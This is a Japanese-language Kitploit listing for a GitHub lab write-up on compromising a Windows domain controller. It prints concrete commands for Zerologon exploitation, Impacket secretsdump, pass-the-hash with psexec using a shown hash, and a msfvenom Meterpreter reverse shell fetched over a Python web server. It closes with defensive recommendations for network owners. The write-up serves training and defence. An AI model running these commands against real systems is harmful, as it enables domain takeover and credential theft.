Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Domain-Controller-DC-Exploitation-with-Metasploit-Impacket — MetasploitとImpacketを使用したエンドツーエンドのドメインコントローラ悪用: DC10を発見、Zerologon(CVE-2020-1472)を悪用、NTLMハッシュを抽出、SYSTEMシェルを取得、Meterpreterセッションを確立しました。 | Kitploit
ツール/GitHubGitHub/nyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket
偵察エクスプロイトフレームワークペイロード生成脆弱性分析横移動ポストエクスプロイトペネトレーションテスト学習と教育ラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubnyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket

Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

MetasploitとImpacketを使用したエンドツーエンドのドメインコントローラ悪用: DC10を発見、Zerologon(CVE-2020-1472)を悪用、NTLMハッシュを抽出、SYSTEMシェルを取得、Meterpreterセッションを確立しました。

リポジトリを見る
410ヶ月前未レビュー

Metasploit + Impacket を用いたドメインコントローラ (DC) のエクスプロイト

Metasploit と Impacket を用いたエンドツーエンドのドメインコントローラエクスプロイト:DC10 を発見し、Zerologon (CVE-2020-1472) を悪用し、NTLM ハッシュを抽出し、SYSTEM シェルを取得し、Meterpreter セッションを確立しました。

エグゼクティブサマリ 本演習では、CVE-2020-1472 (Zerologon) に脆弱なドメインコントローラに対する完全な現実的な攻撃チェーンを実演します。エンゲージメントには、発見、サービスのエンリッチメント、エクスプロイト、資格情報の抽出、横方向の移動、およびポストエクスプロイトの検証が含まれます。Zerologon、Impacket secretsdump + パスザハッシュ、msfvenom/meterpreter ペイロードの組み合わせにより、DC 上で SYSTEM レベルのアクセスを取得し、持続的な Meterpreter セッションを確立することに成功しました。各段階でスクリーンショットとコマンドの成果物を証拠としてキャプチャしました。

𝐋𝐚𝐛 𝐨𝐯𝐞𝐫𝐯𝐢𝐞𝐰: 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐃𝐨𝐦𝐚𝐢𝐧 𝐂𝐨𝐧𝐭𝐫𝐨𝐥𝐥𝐞𝐫 に対して 𝐌𝐞𝐭𝐚𝐬𝐩𝐥𝐨𝐢𝐭 と 𝐈𝐦𝐩𝐚𝐜𝐤𝐞𝐭 を用いた完全な攻撃チェーン(発見、Zerologon、secretsdump、パスザハッシュ、制御された Meterpreter セッション)をシミュレートしました。

𝐖𝐡𝐲 𝐢𝐭 𝐦𝐚𝐭𝐭𝐞𝐫𝐬 𝐭𝐨 𝐨𝐫𝐠𝐚𝐧𝐢𝐳𝐚𝐭𝐢𝐨𝐧𝐬: DC はドメイン全体の認証、グループポリシー、および ID を制御するため、その侵害は完全なビジネス中断、アカウント乗っ取り、データ流出、ランサムウェア展開、および規制上の信頼の喪失に連鎖する可能性があります。DC を保護することで、攻撃者が ID を単一障害点に変えるのを防ぎ、稼働時間、収益、評判を守ります。

Domain Controller (DC) Exploitation with Metasploit + Impacket

SCENARIO

隔離されたラボネットワーク内に 2 台のマシンが用意されています。1 台は DC10 という名前の Windows ドメインコントローラ (DC) で、コア AD サービスをホストしています。もう 1 台は同じサーバサブネットに配置された Kali ワークステーションで、テストに使用します。DC は一般的なドメインサービス (LDAP、Kerberos、SMB など) を公開しており、既知の問題に対して脆弱である可能性があります。Kali ホストは、偵察、エクスプロイト、資格情報アクセス、横方向の移動、ポストエクスプロイトの検証に使用することが期待されます。タスクは、DC を特定し、ドメインの詳細を確認し、該当する手法を用いて初期足がかりを獲得し、管理アクセスを可能にする資格情報を抽出し、リモートシェルおよび管理エージェントセッションを通じて DC の制御を実証することです。その際、パッチ適用済みサービス、制限されたエグレス、エンドポイント防御などの環境的制約に適応します。 DC: 10.1.16.1 Kali: 10.1.16.66

主な発見事項

  • 悪用された重大な脆弱性: CVE-2020-1472 (Zerologon) が正常に悪用され、DC マシンアカウントパスワードが空にリセットされました。
  • 資格情報の漏洩: DC から NTLM ハッシュが抽出され (secretsdump)、管理者資格情報が明らかになり、パスザハッシュが可能になりました。
  • 完全なドメイン制御の実証: 抽出されたハッシュを使用して DC10 上で SYSTEM シェルを取得し (psexec)、安定した Meterpreter リバースシェルを実行し、リモートコード実行と永続性を確認しました。
  • 公開されたサービス: LDAP、Kerberos、SMB および関連する RPC サービスが攻撃ホストから到達可能であり、発見とエクスプロイトが可能でした。
  • 攻撃対象リスク: DC はリモート操作を受け入れ、マシンアカウントの操作やリモートペイロードの実行を許可していました。

1) 発見とスコーピング

msfconsole を DB サポート付きで使用し、MSF 内から nmap スイープを実行し、結果をインポートし、ホストとサービスを整理して DC10 の露出を確認しました。

  • DB サポート付きで msfconsole を起動し、データベース接続を確認しました。
  • msfconsole からサブネット全体に対して nmap スキャンを実行し、結果を MSF DB にインポートしました。
  • hosts テーブルをクリーンアップして Kali IP を削除しました。サービスを確認して DC の兆候を特定しました。
  • MSF の SYN ポートスキャナーを制限されたポート範囲とグローバルスレッドで使用し、サービスデータを精密化しました。
  • Windows ホスト上の SMB をフィンガープリントし、OS の詳細を充実させました。
  • 10.1.16.1 上の LDAP および Kerberos サービスを確認し、LDAP クエリでドメイン名を検証しました。
  • 判断: 10.1.16.1 をエクスプロイトおよび資格情報アクセスの DC 対象とします。
画像 画像 画像

2) サービスのエンリッチメントと DC の確認

MSF で SYN ポートスキャンを実行し、SMB をフィンガープリントし、10.1.16.1 上の LDAP および Kerberos を確認しました。LDAP にクエリを実行してドメイン名を取得しました。

画像 画像 画像 画像 画像 ### SMB バージョンチェック
  • msfconsole で SMB バージョンモジュール auxiliary/scanner/smb/smb_version を使用しました。
  • hosts テーブルからホスト -R でターゲットを設定しました。
  • SMB ダイアレクトと OS の詳細を取得しました。
  • 結果: 10.1.16.1 は Windows Server 情報を示し、ドメインコントローラであることと一致しました。
画像 画像 画像 画像 画像

LDAP クエリ

  • LDAP クエリモジュール auxiliary/gather/ldap_query を使用しました。
  • rhosts 10.1.16.1 に設定し、DC10 に直接アクセスしました。
  • 基本ディレクトリ情報を取得するために実行しました。
  • 結果: ドメイン名が "structureality" であることと、DC 上の LDAP が応答していることを確認しました。
画像 画像 画像 画像

3) Zerologon エクスプロイト(初期アクセス)

auxiliary/admin/dcerpc/cve_2020_1472_zerologon を DC10 に対して実行し、マシンアカウントのパスワードを空にリセットしました。

画像 画像

4) 資格情報アクセス(secretsdump)

Impacket を使用して DC から NTLM ハッシュをダンプし、パスザハッシュのための管理者資格情報を特定しました。

impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]

画像 画像

5) 横方向の移動(psexec)

パスザハッシュと psexec を使用して DC10 上で SYSTEM レベルのシェルを取得し、ホストの同一性を検証しました。

impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 ご覧のとおり、既に C:\Windows\system32 にいます。

画像 画像

6) ポストエクスプロイト(Meterpreter)

reverse_tcp meterpreter ペイロードを生成し、HTTP でホストし、DC10 にダウンロードし、ハンドラを起動し、ペイロードを実行して Meterpreter セッションを開始しました。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe

画像 画像 ターゲットシステムがこの meterpreter 実行ファイルに簡単にアクセスできるように、基本的な Web サーバーを起動しました:

python3 -m http.server 8080

画像 ターゲットマシン上で meterpreter 実行ファイル (secret.exe) を実行しました。 画像 画像 画像 画像 画像

ご覧のとおり、ターゲット DC10 と Kali システム間のリバースシェル接続を確立しました。これは、脆弱なターゲットに対して外部/リモートエクスプロイトのみを使用して達成されました。

Kali システムは DC10 ターゲットと同じサーバサブネットに配置されていますが、これらのタイプの攻撃は、ターゲットシステムがオープンインターネットに露出している場合、インターネット経由でも可能です。

7) 主な成果

  • DC10 が structureality のドメインコントローラであることを特定
  • Zerologon が成功し、資格情報抽出が可能に
  • 管理者ハッシュを使用してパスザハッシュ経由で SYSTEM シェルを取得
  • DC10 上で安定した Meterpreter セッションを確認

証拠

  • MSF DB および nmap サブネットスキャンログ(ホスト/サービスの発見を確認)
  • SMB/LDAP/Kerberos 列挙出力(DC サービスとドメイン名 structureality を確認)
  • Zerologon モジュール出力(マシンアカウントパスワードの空リセットを示す)
  • secretsdump 出力(抽出された NTLM ハッシュ)
  • psexec セッションログ(C:\Windows\System32 を示す)
  • msfvenom および Meterpreter セッションのスクリーンショット(リモート制御を確認)

実行したアクション(概要)

  • 発見とスコーピング: msfconsole から nmap スキャン; MSF DB を使用してホスト/サービスを管理; DC10 をターゲットとして確認
  • サービスのエンリッチメント: SMB フィンガープリント、LDAP クエリ、Kerberos 確認でドメインコントローラの役割を検証
  • 初期アクセス: auxiliary/admin/dcerpc/cve_2020_1472_zerologon を実行して DC マシンアカウントパスワードをリセット
  • 資格情報アクセス: impacket-secretsdump で DC から NTLM ハッシュを抽出
  • 横方向の移動: 管理者 NTLM ハッシュを使用した impacket-psexec → SYSTEM シェル
  • ポストエクスプロイト: meterpreter ペイロードを構築およびホスト (msfvenom)、DC 上でダウンロードおよび実行、持続的セッションを確認

ネットワーク所有者への推奨事項

  • Netlogon の脆弱性を直ちに修正し、CVE-2020-1472 の露出をスキャンで確認する
  • SMB 署名を強制し、DC の SMB および RPC の露出を信頼された管理サブネットのみに制限する
  • 階層化された管理者を実装し、非管理ホストからのリモートサービス実行を拒否する
  • NTLM を無効化または厳密に制御し、Kerberos を優先し、パスザハッシュパターンを監視する
  • エグレス制御: サーバからの送信接続を制限し、必要な宛先とポートのみを許可リストに追加する
  • エンドポイント保護: 未署名のバイナリをブロックし、AMSI 統合スキャンを PowerShell に適用する
  • 監視: マシンアカウントパスワードのリセット、異常な DRSUAPI アクセス、予期しないハンドラのようなリスナーに対してアラートを発する
  • 特権資格情報を定期的にローテーションし、LAPS または PAM ソリューションを使用してハッシュ再利用のリスクを低減する
ツールをダウンロード